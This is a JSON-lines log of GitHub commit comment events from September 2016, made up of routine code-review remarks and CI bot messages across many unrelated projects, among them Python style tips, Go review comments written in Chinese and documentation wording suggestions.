{"id":"4595936727","type":"CommitCommentEvent","actor":{"login":"thomtux"},"repo":{"name":"thomtux/otrs-QuickOwnerChange"},"payload":{"comment":{"id":19112820,"position":null,"line":null,"path":null,"commit_id":"6d544c5bd60ff2a0873deaa4761a20dcd9f82a46","created_at":"2016-09-21T12:33:21Z","updated_at":"2016-09-21T12:33:21Z","body":"Insert option to lock or unlock the ticket after change the owner"}},"created_at":"2016-09-21T12:33:21Z"}
{"id":"4595937391","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112824,"position":null,"line":null,"path":null,"commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:33:29Z","updated_at":"2016-09-21T12:33:29Z","body":"print\r\nprint msg\r\nprint\r\n\r\ncan be rewritten to:\r\nprint '\\n%s\\n' % msg"}},"created_at":"2016-09-21T12:33:29Z"}
{"id":"4595937943","type":"CommitCommentEvent","actor":{"login":"mworrell"},"repo":{"name":"zotonic/zotonic"},"payload":{"comment":{"id":19112826,"position":null,"line":null,"path":null,"commit_id":"c53773fe2080f8f2442e4b07018d8b7a877f8d3b","created_at":"2016-09-21T12:33:36Z","updated_at":"2016-09-21T12:33:36Z","body":"Wrong commit comment, should have been 18.3.2 (not 19.3.2)"}},"created_at":"2016-09-21T12:33:36Z"}
{"id":"4595942892","type":"CommitCommentEvent","actor":{"login":"evsheffield"},"repo":{"name":"iVantage/generator-ivh-react-component"},"payload":{"comment":{"id":19112834,"position":31,"line":31,"path":"generators/app/templates/README.md","commit_id":"e367ff2486ef884fb7e6066f084c6b0f8dc21880","created_at":"2016-09-21T12:34:34Z","updated_at":"2016-09-21T12:34:34Z","body":"It seems like this section should perhaps be included in the project README instead of in the component template README."}},"created_at":"2016-09-21T12:34:34Z"}
{"id":"4595943111","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19112835,"position":44,"line":44,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"e792a89b67ccb3cf04c10e47d3804cf32688fd00","created_at":"2016-09-21T12:34:37Z","updated_at":"2016-09-21T12:34:37Z","body":"Indeed. Not sure why I missed this. Looking at it now."}},"created_at":"2016-09-21T12:34:37Z"}
{"id":"4595943838","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19112836,"position":null,"line":null,"path":null,"commit_id":"54d826cf3c5dea7d3cb08435c088d18857f6c79b","created_at":"2016-09-21T12:34:46Z","updated_at":"2016-09-21T12:34:46Z","body":"@snicolet OK, as it was still at the beginning (very few games played) I stopped the test."}},"created_at":"2016-09-21T12:34:46Z"}
{"id":"4595944403","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19112838,"position":118,"line":103,"path":"README.md","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T12:34:53Z","updated_at":"2016-09-21T12:34:53Z","body":"add yourself as contributor to the bottom of the README!"}},"created_at":"2016-09-21T12:34:53Z"}
{"id":"4595945716","type":"CommitCommentEvent","actor":{"login":"ChrisPCN"},"repo":{"name":"ChrisPCN/Git_Test"},"payload":{"comment":{"id":19112844,"position":null,"line":null,"path":null,"commit_id":"5e46845358567add835d97c415d04964f51c4195","created_at":"2016-09-21T12:35:10Z","updated_at":"2016-09-21T12:35:10Z","body":"GitHub test file"}},"created_at":"2016-09-21T12:35:10Z"}
{"id":"4595949060","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112850,"position":49,"line":49,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:35:50Z","updated_at":"2016-09-21T12:35:50Z","body":" f = open(\"numbers.csv\", \"w\") \r\nYou can do:\r\n\r\nwith open('numbers.csv', 'w'):\r\n     //logic for putting stuffs into your csv file\r\n\r\nonce out of the with block the file handler will close"}},"created_at":"2016-09-21T12:35:50Z"}
{"id":"4595949281","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19112852,"position":18,"line":20,"path":"daemon.js","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T12:35:53Z","updated_at":"2016-09-21T12:35:53Z","body":"\"only has to be done once\"\r\n\r\nWhat happens if the storage server restarts?"}},"created_at":"2016-09-21T12:35:53Z"}
{"id":"4595950906","type":"CommitCommentEvent","actor":{"login":"simplechris"},"repo":{"name":"monzo/mercury"},"payload":{"comment":{"id":19112857,"position":null,"line":null,"path":null,"commit_id":"d4d01cf2efdd19e2d5178c9eb626a83699b88353","created_at":"2016-09-21T12:36:12Z","updated_at":"2016-09-21T12:36:12Z","body":"Ahh, interesting. \r\n\r\nI've been prototyping using mercury for a while, but hadn't been keeping up with how mercury/thyphon were converging."}},"created_at":"2016-09-21T12:36:12Z"}
{"id":"4595951445","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19112862,"position":22,"line":150,"path":"generators/server/index.js","commit_id":"80bf4fbc4de73bed78b1ca5e28f0a817733cc1e2","created_at":"2016-09-21T12:36:19Z","updated_at":"2016-09-21T12:36:19Z","body":"@jdubois the check for `no` is not required as its a new option so this can be just `this.messageBroker = this.config.get('messageBroker');`"}},"created_at":"2016-09-21T12:36:19Z"}
{"id":"4595953817","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19112871,"position":8,"line":268,"path":"truffle/src/main/java/org/jruby/truffle/core/hash/HashNodes.java","commit_id":"457ca026861f7ac716f9508b50711f45e6710660","created_at":"2016-09-21T12:36:49Z","updated_at":"2016-09-21T12:36:49Z","body":"Java `==` won't work well on boxed primitives though.\r\nA `ReferenceEqualNode` would be needed.\r\nThere is already SameOrEqualNode for the composition with `==`, maybe we can have a SameOrEqlNode."}},"created_at":"2016-09-21T12:36:49Z"}
{"id":"4595954917","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19112875,"position":22,"line":150,"path":"generators/server/index.js","commit_id":"80bf4fbc4de73bed78b1ca5e28f0a817733cc1e2","created_at":"2016-09-21T12:37:02Z","updated_at":"2016-09-21T12:37:02Z","body":"it was for backward compatibility of existing options"}},"created_at":"2016-09-21T12:37:02Z"}
{"id":"4595954922","type":"CommitCommentEvent","actor":{"login":"andrebola"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19112876,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-21T12:37:02Z","updated_at":"2016-09-21T12:37:02Z","body":"Thanks @alastair, https://github.com/MTG/freesound/commit/e49651e236127f4dd5000cddc88370583ff5564a now it taking less than a second for that pack."}},"created_at":"2016-09-21T12:37:02Z"}
{"id":"4595955915","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112879,"position":21,"line":21,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:37:15Z","updated_at":"2016-09-21T12:37:15Z","body":"例子代码的缩进注意下"}},"created_at":"2016-09-21T12:37:15Z"}
{"id":"4595956361","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19112880,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T12:37:20Z","updated_at":"2016-09-21T12:37:20Z","body":"So why did you add that complexity? What's the need for `apath`? Also, `strcpy` does copy the terminator. This should be all there's to it, right?\r\n```\r\nint path_to_filename2(string fpath, char* &fname) {\r\n    if (fpath.size() == 0) {\r\n        return -1;\r\n    }\r\n    if (fpath[fpath.size()-1] == '/') {\r\n        return -2;\r\n    }\r\n    const char* bname = basename(fpath.c_str());\r\n    fname = new char[strlen(bname)+1];\r\n    strcpy(fname, bname);\r\n    return 0;\r\n}\r\n```\r\n\r\nYou haven't yet elaborated on the portability issue. If that indeed prevails then any discussion of implementation details is useless anyway 😁 "}},"created_at":"2016-09-21T12:37:20Z"}
{"id":"4595956843","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112882,"position":29,"line":29,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:37:26Z","updated_at":"2016-09-21T12:37:26Z","body":"这里不要空行"}},"created_at":"2016-09-21T12:37:26Z"}
{"id":"4595959109","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112886,"position":36,"line":36,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:37:52Z","updated_at":"2016-09-21T12:37:52Z","body":"log.Fatal就直接退出了，return就不需要了"}},"created_at":"2016-09-21T12:37:52Z"}
{"id":"4595960935","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19112888,"position":118,"line":103,"path":"README.md","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T12:38:13Z","updated_at":"2016-09-21T12:38:13Z","body":"Should probably also have a change log; would basically be \"no more support for N|Solid 1.x; support for N|Solid 2.x\", mention change in options"}},"created_at":"2016-09-21T12:38:13Z"}
{"id":"4595961555","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112889,"position":47,"line":47,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:38:21Z","updated_at":"2016-09-21T12:38:21Z","body":"这里演示下怎么读取图片的"}},"created_at":"2016-09-21T12:38:21Z"}
{"id":"4595962505","type":"CommitCommentEvent","actor":{"login":"n8659150"},"repo":{"name":"n8659150/iEagleNest"},"payload":{"comment":{"id":19112891,"position":null,"line":null,"path":null,"commit_id":"3be7e694dfecc2c2dd954506d7973f60a30776eb","created_at":"2016-09-21T12:38:33Z","updated_at":"2016-09-21T12:38:33Z","body":"#1 订单数据获取 fixed"}},"created_at":"2016-09-21T12:38:33Z"}
{"id":"4595962783","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112892,"position":57,"line":57,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:38:36Z","updated_at":"2016-09-21T12:38:36Z","body":"这里的空行也不需要"}},"created_at":"2016-09-21T12:38:36Z"}
{"id":"4595962978","type":"CommitCommentEvent","actor":{"login":"gmdimitriz"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19112893,"position":51,"line":51,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T12:38:39Z","updated_at":"2016-09-21T12:38:39Z","body":"i will change that... but i think you this is the right way and not like you said... im saying that because te return value defines if the device is detected or not... if this return false, its because an wrong word is received (without altitude, my device never send without that, and if it is out of my device range) this means its not my device, so i think it has to return false instead true even without that parameter...\r\n\r\ni will change, but, i think its not wrong. thanks"}},"created_at":"2016-09-21T12:38:39Z"}
{"id":"4595963441","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112894,"position":59,"line":59,"path":"README.md","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:38:45Z","updated_at":"2016-09-21T12:38:45Z","body":"多余空行"}},"created_at":"2016-09-21T12:38:45Z"}
{"id":"4595967197","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112902,"position":22,"line":22,"path":"core.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:39:31Z","updated_at":"2016-09-21T12:39:31Z","body":"这句什么用途？上一句不是写了吗？"}},"created_at":"2016-09-21T12:39:31Z"}
{"id":"4595967327","type":"CommitCommentEvent","actor":{"login":"codeprof2"},"repo":{"name":"carestad/Medoo"},"payload":{"comment":{"id":19112904,"position":null,"line":null,"path":null,"commit_id":"876df443b89e55d7a5748f1b721fa13e191fd8af","created_at":"2016-09-21T12:39:33Z","updated_at":"2016-09-21T12:39:33Z","body":"thanks, its work."}},"created_at":"2016-09-21T12:39:33Z"}
{"id":"4595969311","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/style-guide"},"payload":{"comment":{"id":19112911,"position":10,"line":13,"path":"README.adoc","commit_id":"cfcb58121b1d7aff6b045354aebccbb151ebd1df","created_at":"2016-09-21T12:39:58Z","updated_at":"2016-09-21T12:39:58Z","body":"This is a bit abstract and not very helpful to potential authors I think. I suggest rolling it into the next item in some way, since the working build from a short guide is a quick win anyway."}},"created_at":"2016-09-21T12:39:58Z"}
{"id":"4595969590","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112912,"position":26,"line":26,"path":"core.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:40:01Z","updated_at":"2016-09-21T12:40:01Z","body":"这个函数有在用吗？"}},"created_at":"2016-09-21T12:40:01Z"}
{"id":"4595970097","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/frameworks_base"},"payload":{"comment":{"id":19112913,"position":18,"line":18,"path":"core/java/com/android/internal/util/chikara/OmniSwitchConstants.java","commit_id":"f569e8378a3eecd54b0d489603d8150fcc952163","created_at":"2016-09-21T12:40:08Z","updated_at":"2016-09-21T12:40:08Z","body":"You fixed it :heart_eyes: "}},"created_at":"2016-09-21T12:40:08Z"}
{"id":"4595971227","type":"CommitCommentEvent","actor":{"login":"keshavbhatt"},"repo":{"name":"snapcraft-gui/snapcraft-gui"},"payload":{"comment":{"id":19112917,"position":66,"line":514,"path":"snapcraft-qt/mainwindow.cpp","commit_id":"2bfd0163e291e18046559dfb6e67c4242be1d4b1","created_at":"2016-09-21T12:40:20Z","updated_at":"2016-09-21T12:40:20Z","body":"a do not delete just close function"}},"created_at":"2016-09-21T12:40:20Z"}
{"id":"4595973478","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112922,"position":34,"line":34,"path":"core.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:40:46Z","updated_at":"2016-09-21T12:40:46Z","body":"goadb里面又直接往手机上写文件的接口，可以不用在本地创建个文件，直接写到手机上"}},"created_at":"2016-09-21T12:40:46Z"}
{"id":"4595976127","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112927,"position":60,"line":60,"path":"core.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:41:15Z","updated_at":"2016-09-21T12:41:15Z","body":"rand出来的port不一定不被占用"}},"created_at":"2016-09-21T12:41:15Z"}
{"id":"4595978558","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19112933,"position":43,"line":87,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:41:42Z","updated_at":"2016-09-21T12:41:42Z","body":"double check this - remove initial payment?"}},"created_at":"2016-09-21T12:41:42Z"}
{"id":"4595979134","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112935,"position":null,"line":null,"path":null,"commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:41:48Z","updated_at":"2016-09-21T12:41:48Z","body":"even for rough scripts, you should get in the habit of doing the following:\r\n\r\n```\r\ndef main(argv=None):\r\n     //main script logic here \r\n     //or function calls\r\n\r\nif __name__ == '__main__':\r\n    try:\r\n        sys.exit(main())\r\n    except Exception as e:\r\n        traceback.print_exc()\r\n    except KeyboardInterrupt:\r\n        sys.exit('Exit on User Request.')\r\n    sys.exit(2)\r\n```"}},"created_at":"2016-09-21T12:41:48Z"}
{"id":"4595980483","type":"CommitCommentEvent","actor":{"login":"volaya"},"repo":{"name":"boundlessgeo/qgis-plugin-template"},"payload":{"comment":{"id":19112938,"position":27,"line":27,"path":"pavement.py","commit_id":"712640bb86f66b3d7be287863e54e4d8651f0633","created_at":"2016-09-21T12:42:03Z","updated_at":"2016-09-21T12:42:03Z","body":"ah, it was excluded because the package task made its own metadata, to avoid having two of them in the zip file. It doesn make in this context, though, so I will remove it"}},"created_at":"2016-09-21T12:42:03Z"}
{"id":"4595980801","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112939,"position":60,"line":60,"path":"core.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:42:08Z","updated_at":"2016-09-21T12:42:08Z","body":"有个很简单的代码可以参考下 <https://github.com/facebookgo/freeport/blob/master/freeport.go>"}},"created_at":"2016-09-21T12:42:08Z"}
{"id":"4595981473","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/style-guide"},"payload":{"comment":{"id":19112940,"position":13,"line":16,"path":"README.adoc","commit_id":"cfcb58121b1d7aff6b045354aebccbb151ebd1df","created_at":"2016-09-21T12:42:16Z","updated_at":"2016-09-21T12:42:16Z","body":"Bit of a mouthful. Probably worth redoing. Perhaps \"Don't require readers to understand any topic unless such a topic is considered a prerequisite for the task.\""}},"created_at":"2016-09-21T12:42:16Z"}
{"id":"4595981985","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"srinivasdandibhotla/terraform-provider-softlayer"},"payload":{"comment":{"id":19112942,"position":13,"line":34,"path":"docs/softlayer_lb_local.md","commit_id":"b5972bb0555a332d2859829fb4b7921e51d9a54d","created_at":"2016-09-21T12:42:21Z","updated_at":"2016-09-21T12:42:21Z","body":"Can we re-word to something like: \"Set to `true` if a dedicated load balancer is requested.  Default: `false` (shared)\""}},"created_at":"2016-09-21T12:42:21Z"}
{"id":"4595983627","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112945,"position":34,"line":34,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:42:41Z","updated_at":"2016-09-21T12:42:41Z","body":"这句什么用途 ？"}},"created_at":"2016-09-21T12:42:41Z"}
{"id":"4595984157","type":"CommitCommentEvent","actor":{"login":"StephenCWills"},"repo":{"name":"GridProtectionAlliance/openSPM"},"payload":{"comment":{"id":19112947,"position":36,"line":3014,"path":"Source/WebSite/DataHub.cs","commit_id":"a66a5605add1bf5a8c1feaf233dae06f336d8d17","created_at":"2016-09-21T12:42:46Z","updated_at":"2016-09-21T12:42:46Z","body":"I'm pretty sure the quotes here are going to cause problems."}},"created_at":"2016-09-21T12:42:46Z"}
{"id":"4595985568","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19112952,"position":38,"line":82,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:43:02Z","updated_at":"2016-09-21T12:43:02Z","body":"this isn't confusing :)"}},"created_at":"2016-09-21T12:43:02Z"}
{"id":"4595985620","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19112953,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T12:43:03Z","updated_at":"2016-09-21T12:43:03Z","body":"GetInternalVariableBug (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T12:43:03Z"}
{"id":"4595985907","type":"CommitCommentEvent","actor":{"login":"mangrio123"},"repo":{"name":"zarpio/compare"},"payload":{"comment":{"id":19112955,"position":4,"line":10,"path":"compare-remote.php","commit_id":"3ae0c533a2aca0b1e07589a5314b7916c7d098a2","created_at":"2016-09-21T12:43:07Z","updated_at":"2016-09-21T12:43:07Z","body":"please correct the constants spelling here."}},"created_at":"2016-09-21T12:43:07Z"}
{"id":"4595989508","type":"CommitCommentEvent","actor":{"login":"LGA1150"},"repo":{"name":"bazingaterry/SYSUv6-DNS"},"payload":{"comment":{"id":19112965,"position":null,"line":null,"path":null,"commit_id":"6900f26c63df5f9ce690ea50309297e38d611a14","created_at":"2016-09-21T12:43:48Z","updated_at":"2016-09-21T12:43:48Z","body":"#9"}},"created_at":"2016-09-21T12:43:48Z"}
{"id":"4595991257","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19112967,"position":null,"line":null,"path":null,"commit_id":"27380d12a98c14aa370bb55ff14e2405baafa051","created_at":"2016-09-21T12:44:09Z","updated_at":"2016-09-21T12:44:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1079](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13766&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T12:44:09Z"}
{"id":"4595992125","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19112972,"position":37,"line":37,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:44:19Z","updated_at":"2016-09-21T12:44:19Z","body":"不strip也没关系，可以直接这么简单的写 if serial == \"\" 这个函数也要开放吗？"}},"created_at":"2016-09-21T12:44:19Z"}
{"id":"4595993368","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19112974,"position":51,"line":95,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:44:33Z","updated_at":"2016-09-21T12:44:33Z","body":"check this"}},"created_at":"2016-09-21T12:44:33Z"}
{"id":"4595993407","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/style-guide"},"payload":{"comment":{"id":19112975,"position":9,"line":12,"path":"README.adoc","commit_id":"cfcb58121b1d7aff6b045354aebccbb151ebd1df","created_at":"2016-09-21T12:44:33Z","updated_at":"2016-09-21T12:44:33Z","body":"Do we really need this one? We might prioritise guides that match frequent Google searches, but I don't see why it should be a common trait. Niche guides can be useful too."}},"created_at":"2016-09-21T12:44:33Z"}
{"id":"4595998483","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19112984,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T12:45:33Z","updated_at":"2016-09-21T12:45:33Z","body":"BTW, I had a look at the config we use for opi+2e, and I think a fair number of options are not needed, would a cleanup of the low hanging fruits be useful ?"}},"created_at":"2016-09-21T12:45:33Z"}
{"id":"4595998672","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19112985,"position":null,"line":null,"path":null,"commit_id":"dd78780363bba0fa33d95375ef9eb55a9014471f","created_at":"2016-09-21T12:45:36Z","updated_at":"2016-09-21T12:45:36Z","body":":+1:"}},"created_at":"2016-09-21T12:45:36Z"}
{"id":"4595998691","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112986,"position":2,"line":2,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:45:36Z","updated_at":"2016-09-21T12:45:36Z","body":"I see you added this but didn't use it. It will simplify writing to csv in python. If this csv is going to contain more metadata per number in the csv. I would highly suggest looking into the csv.DictWriter -> which is awesome"}},"created_at":"2016-09-21T12:45:36Z"}
{"id":"4595998845","type":"CommitCommentEvent","actor":{"login":"alexsedova"},"repo":{"name":"Praqma/JenkinsAsCodeReference"},"payload":{"comment":{"id":19112987,"position":36,"line":46,"path":"README.md","commit_id":"84d655eb27defdce099a5eeafac93e853abeb45a","created_at":"2016-09-21T12:45:38Z","updated_at":"2016-09-21T12:45:38Z","body":"Docker-compose creates directories on the host if they do not exist. Should we remove mkdir commands?  "}},"created_at":"2016-09-21T12:45:38Z"}
{"id":"4595999534","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19112989,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-21T12:45:45Z","updated_at":"2016-09-21T12:45:45Z","body":"Seems like I missed the moment when this was added. Shouldn't this be generic for all events that can be cancelled?"}},"created_at":"2016-09-21T12:45:45Z"}
{"id":"4596002760","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/style-guide"},"payload":{"comment":{"id":19112995,"position":null,"line":null,"path":null,"commit_id":"cfcb58121b1d7aff6b045354aebccbb151ebd1df","created_at":"2016-09-21T12:46:22Z","updated_at":"2016-09-21T12:46:22Z","body":"I pretty much copied the items from gradle/guides#24 and adjusted a few things. I'd like to discuss here what stays, what goes, and what needs minor changes."}},"created_at":"2016-09-21T12:46:22Z"}
{"id":"4596003263","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19112997,"position":null,"line":null,"path":null,"commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:46:29Z","updated_at":"2016-09-21T12:46:29Z","body":"> \"Write documentation a little tutorial\"\r\n\r\n**and** missing?"}},"created_at":"2016-09-21T12:46:29Z"}
{"id":"4596007047","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19113008,"position":null,"line":null,"path":null,"commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:47:15Z","updated_at":"2016-09-21T12:47:15Z","body":"For customer facing scripts, lets make sure we use the python logger to standard out, rather than print lines. We can put logging levels in for the users, with DEBUG, INFO, ERROR. If you need help implementing this, let me know but that would be a great feature to customer facing scripts as we write them."}},"created_at":"2016-09-21T12:47:15Z"}
{"id":"4596008104","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113012,"position":5,"line":5,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:47:27Z","updated_at":"2016-09-21T12:47:27Z","body":"We usually say \"performance hit\" instead of \"performance toll\"."}},"created_at":"2016-09-21T12:47:27Z"}
{"id":"4596008210","type":"CommitCommentEvent","actor":{"login":"matthieu637"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":19113013,"position":null,"line":null,"path":null,"commit_id":"c8f446f640b12b0577063eca8fab004e73c0aefc","created_at":"2016-09-21T12:47:27Z","updated_at":"2016-09-21T12:47:27Z","body":"Apparently calling clear_param() on LayerParameter is enough."}},"created_at":"2016-09-21T12:47:27Z"}
{"id":"4596008750","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19113015,"position":null,"line":null,"path":null,"commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-21T12:47:34Z","updated_at":"2016-09-21T12:47:34Z","body":"Sorry, I wasn't clear enough. Yes, the text already mentions the target device. But Ithink that with the current text, the reader could get the idea that the micro:bit or esp8266 is just an example of a device that works with the program. I think the article should say, much more explicitly than now, that the tools are for specific boards and won't work with others."}},"created_at":"2016-09-21T12:47:34Z"}
